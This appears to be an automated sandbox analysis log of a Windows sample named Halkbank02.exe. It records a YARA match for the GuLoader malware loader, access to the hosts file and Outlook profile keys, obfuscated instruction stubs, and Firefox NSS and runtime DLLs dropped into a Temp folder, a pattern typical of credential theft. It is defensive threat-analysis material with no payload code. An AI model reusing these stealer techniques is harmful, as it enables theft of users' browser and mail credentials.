      Source: C:\Users\user\Desktop\Halkbank02.exe | Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-F44B36F3-391C74315
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4016:120:WilError_01
      Source: C:\Users\user\Desktop\Halkbank02.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\Halkbank02.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\Halkbank02.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\Halkbank02.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, mozglue.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.874818070.00000000200E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.28.dr
      Source: Binary string: ucrtbase.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, ucrtbase.dll.28.dr
      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-memory-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, freebl3.dll.28.dr
      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874674316.00000000200D4000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875491758.000000001F448000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875685309.000000001F450000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-synch-l1-1-0.dll.28.dr
      Source: Binary string: vcruntime140.i386.pdbGCTL source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, vcruntime140.dll.28.dr
      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, mozglue.dll.28.dr
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.869027129.000000001F838000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-processthreads-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, freebl3.dll.28.dr
      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000002.901129963.000000001F860000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874818070.00000000200E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876256297.000000001F478000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr
      Source: Binary string: msvcp140.i386.pdb source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp, msvcp140.dll.28.dr
      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-profile-l1-1-0.dll.28.dr
      Source: Binary string: ucrtbase.pdbUGP source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, ucrtbase.dll.28.dr
      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nssdbm3.dll.28.dr
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.870977200.000000001F83C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.28.dr
      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-processenvironment-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.868789686.000000001F83C000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875685309.000000001F450000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.869710011.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Halkbank02.exe, api-ms-win-core-processthreads-l1-1-1.dll.28.dr
      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-namedpipe-l1-1-0.dll.28.dr
      Source: Binary string: vcruntime140.i386.pdb source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, vcruntime140.dll.28.dr
      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876736098.000000001F4B0000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-rtlsupport-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nssdbm3.dll.28.dr
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875491758.000000001F448000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-string-l1-1-0.dll.28.dr
      Source: Binary string: msvcp140.i386.pdbGCTL source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp, msvcp140.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874994667.000000001F404000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874994667.000000001F404000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.871542123.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.28.dr

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match File source: 00000001.00000002.562813823.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_00403640 push 966DCA76h; iretd 1_2_00403645
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_00405A45 push esp; iretd 1_2_00405A5A
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_00403C65 push ds; iretd 1_2_00403C6E
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_00405E73 push ds; iretd 1_2_00405E8A
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_00404A75 push 7B3E4015h; iretd 1_2_00404A7A
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_00407231 push esp; retf 1_2_00407234
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_004080C5 push E868A7E5h; iretd 1_2_004080CA
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_00406ED7 push esi; ret 1_2_00406ED8
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_004082EB pushfd ; iretd 1_2_004082F5
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_004080ED push 7767F77Ch; iretd 1_2_004080F2
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_00408105 push 03C6A3FEh; iretd 1_2_00408112
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_00407B29 pushfd ; retf 1_2_00407B2A
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_004061DD push 22BD4488h; iretd 1_2_004061E6
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 1_2_022A7409 pushfd ; iretd 1_2_022A7412
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 28_3_1E531696 push cs; ret 28_3_1E5316A2
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 28_3_1E53394D push esi; ret 28_3_1E533997
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 28_3_1E53430B push cs; ret 28_3_1E53432A
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 28_3_1E53298B pushad ; ret 28_3_1E53299F
      Source: C:\Users\user\Desktop\Halkbank02.exe Code function: 28_3_1E5323B5 push cs; ret 28_3_1E5323B6
      Source: msvcp140.dll.28.dr Static PE information: section name: .didat
      Source: api-ms-win-core-console-l1-1-0.dll.28.dr Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\nss3.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll
      Source: C:\Users\user\Desktop\Halkbank02.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll